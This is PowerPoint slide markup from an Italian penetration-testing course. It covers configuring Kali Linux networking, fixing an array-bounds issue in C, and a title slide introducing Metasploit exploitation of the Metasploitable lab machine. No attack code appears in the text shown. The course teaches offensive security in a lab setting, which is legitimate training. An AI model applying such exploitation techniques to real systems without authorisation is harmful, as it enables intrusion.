          <p:cNvPr name="TextBox 15" id="15"/>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Tree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="fast">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730615"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2753760" y="33924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8" id="18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="10464478" y="5853172"/>
            <a:ext cx="6894461" cy="3204436"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="3204436" w="6894461">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6894461" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6894461" y="3204436"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3204436"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId5"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="-8964"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 19" id="19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="11607435" y="1823259"/>
            <a:ext cx="3648076" cy="2689129"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="2689129" w="3648076">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3648076" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3648076" y="2689129"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2689129"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId6"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="-13765"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 20" id="20"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1337170" y="882169"/>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1.1 - CONFIGURAZIONE KALI LINUX</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true" rot="0">
            <a:off x="8845815" y="1717230"/>
            <a:ext cx="2510721" cy="709279"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="709279" w="2510721">
                <a:moveTo>
                  <a:pt x="0" y="709279"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2510721" y="709279"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2510721" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="709279"/>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23" id="23"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="true"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId9"/>
          <a:srcRect l="0" t="0" r="0" b="0"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="5709765">
            <a:off x="14599154" y="3891426"/>
            <a:ext cx="1827200" cy="1763248"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 24" id="24"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="449352" y="1747059"/>
            <a:ext cx="4080718"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KALI LINUX</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TextBox 27" id="27"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="737632" y="3125982"/>
            <a:ext cx="8859048" cy="6170418"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just" marL="419956" indent="-209978" lvl="1">
              <a:lnSpc>
                <a:spcPts val="2723"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1945">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>Aprire un terminale di comando</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1945">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>: Avviamo Kali Linux e apriamo un terminale di comando.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" marL="419956" indent="-209978" lvl="1">
              <a:lnSpc>
                <a:spcPts val="2723"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1945">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>Accedere al file di configurazione di rete</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1945">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>: Digitiamo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1945">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold Italics"/>
              </a:rPr>
              <a:t>sudo nano /etc/network/interfaces</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1945">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t> e premiamo Invio. Questo comando ci permetterà di accedere al file che contiene la configurazione di rete della nostra macchina.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" marL="419956" indent="-209978" lvl="1">
              <a:lnSpc>
                <a:spcPts val="2723"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1945">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>Modificare l'indirizzo IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1945">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>: Nel file che si aprirà, cerchiamo la riga che contiene l'indirizzo IP attuale. Modifichiamolo con l'indirizzo IP richiesto.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" marL="419956" indent="-209978" lvl="1">
              <a:lnSpc>
                <a:spcPts val="2723"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1945">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>Salvare le modifiche</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1945">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>: Per salvare le modifiche, premiamo i tasti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1945">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1945">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>Control + O</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1945">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>, poi premiamo Invio e per chiudere l'editor nano, premiamo i tasti </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1945">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>Control + X</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1945">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" marL="419956" indent="-209978" lvl="1">
              <a:lnSpc>
                <a:spcPts val="2723"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1945">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Semi-Bold"/>
              </a:rPr>
              <a:t>Riavviare la macchina</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1945">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>: Digitiamo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1945">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>reboot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1945">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t> nel terminale e premiamo Invio per riavviare la macchina.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" marL="419956" indent="-209978" lvl="1">
              <a:lnSpc>
                <a:spcPts val="2723"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1945">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Semi-Bold"/>
              </a:rPr>
              <a:t>Verificare la modifica dell'indirizzo IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1945">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>: Dopo il riavvio, riapriamo un terminale di comando e digitiamo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1945">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Semi-Bold"/>
              </a:rPr>
              <a:t>ifconfig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1945">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>. Questo comando ci mostrerà la configurazione della rete attuale. Verifichiamo che l'indirizzo IP sia stato modificato correttamente.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="2723"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="fast">
    <p:cover dir="u"/>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3.3 - CODICE DI SICUREZZA</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8558768" y="819926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0" id="10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="1122036" y="3137065"/>
            <a:ext cx="7369549" cy="4012871"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="4012871" w="7369549">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7369549" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7369549" y="4012870"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4012870"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId4"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 11" id="1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2" id="1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13" id="13"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="9558385" y="2137910"/>
            <a:ext cx="6396507" cy="6616574"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="3261"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2329">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>In linguaggio C, non esiste una funzione predefinita che restituisce la lunghezza di un array. Per trovare la lunghezza di un array, dobbiamo utilizzare l'operatore sizeof. Questa operazione consiste nel dividere la dimensione totale in memoria dell'array per la dimensione in memoria del primo elemento dell'array (sapendo che tutti gli elementi dell'array sono dello stesso tipo). </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="2981"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="3401"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2429">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>In questo modo otteniamo la lunghezza dell'array. Successivamente, possiamo effettuare un controllo if per verificare se il valore di i supera la lunghezza appena calcolata; in tal caso, il ciclo for verrà interrotto con un break.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="fast">
    <p:cover dir="d"/>
  </p:transition>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22331" y="-2053266"/>
            <a:ext cx="8630112" cy="8229600"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="8229600" w="8630112">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8630113" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8630113" y="8229600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="8229600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect l="0" t="-204" r="0" b="-204"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 3" id="3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="-1594436" y="282523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318348" y="3414247"/>
            <a:ext cx="8630112" cy="8229600"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="8229600" w="8630112">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8630112" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8630112" y="8229600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="8229600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect l="0" t="-204" r="0" b="-204"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 5" id="5"/>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6" id="6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="10657601" y="-15397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7" id="7"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1337170" y="825019"/>
            <a:ext cx="14768151" cy="528087"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" marL="0" indent="0" lvl="0">
              <a:lnSpc>
                <a:spcPts val="3552"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4800" spc="-436">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Bank Gothic"/>
              </a:rPr>
              <a:t>3.4 - VERIFICA CODICE DI SICUREZZA</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="AutoShape 8" id="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8558768" y="8199268"/>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0" id="10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="2842006" y="1432050"/>
            <a:ext cx="2870522" cy="8075919"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="8075919" w="2870522">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2870523" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2870523" y="8075919"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="8075919"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId4"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 11" id="1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2" id="1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3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 13" id="13"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="7084686" y="3357097"/>
            <a:ext cx="8789094" cy="2113789"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="4241"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3029">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>Infatti, dopo aver inserito il codice per interrompere il ciclo for non appena l'indice supera la lunghezza dell'array,  l'output viene generato correttamente.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="fast">
    <p:cover dir="l"/>
  </p:transition>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219042" y="442756"/>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0595691" y="2609179"/>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2110547" y="3815306"/>
            <a:ext cx="14768151" cy="2118334"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="7769"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" marL="0" indent="0" lvl="0">
              <a:lnSpc>
                <a:spcPts val="7769"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="10499" spc="-955">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Bank Gothic"/>
              </a:rPr>
              <a:t>GIORNO   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="10499" spc="-955">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Bank Gothic"/>
              </a:rPr>
              <a:t>4</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2" id="22"/>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
        <p:nvSpPr>
          <p:cNvPr name="TextBox 23" id="23"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="4913445" y="6357437"/>
            <a:ext cx="14768151" cy="1719981"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="4292"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5800" spc="-527">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Bank Gothic"/>
              </a:rPr>
              <a:t>EXPLOIT </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="4292"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5800" spc="-527">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Bank Gothic"/>
              </a:rPr>
              <a:t>METASPLOITABLE </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" marL="0" indent="0" lvl="0">
              <a:lnSpc>
                <a:spcPts val="4292"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5800" spc="-527">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Bank Gothic"/>
              </a:rPr>
              <a:t>CON METASPLOIT</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="fast">
    <p:cover dir="l"/>
  </p:transition>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5868" y="-635766"/>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94065" y="44628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9954" y="763155"/>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sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 5" id="5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="-10800000">
            <a:off x="15751273" y="-1086697"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 6" id="6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="3796150" y="763155"/>
            <a:ext cx="13253600" cy="8642702"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="3490660" cy="2276267"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 7" id="7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false" rot="0">
              <a:off x="0" y="0"/>
              <a:ext cx="3490660" cy="2276267"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="2276267" w="3490660">
                  <a:moveTo>
                    <a:pt x="14603" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3476057" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3479930" y="0"/>
                    <a:pt x="3483644" y="1539"/>
                    <a:pt x="3486383" y="4277"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3489122" y="7016"/>
                    <a:pt x="3490660" y="10730"/>
                    <a:pt x="3490660" y="14603"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3490660" y="2261664"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3490660" y="2269729"/>
                    <a:pt x="3484122" y="2276267"/>
                    <a:pt x="3476057" y="2276267"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="14603" y="2276267"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="6538" y="2276267"/>
                    <a:pt x="0" y="2269729"/>
                    <a:pt x="0" y="2261664"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="14603"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="10730"/>
                    <a:pt x="1539" y="7016"/>
                    <a:pt x="4277" y="4277"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7016" y="1539"/>
                    <a:pt x="10730" y="0"/>
                    <a:pt x="14603" y="0"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 8" id="8"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="-47625"/>
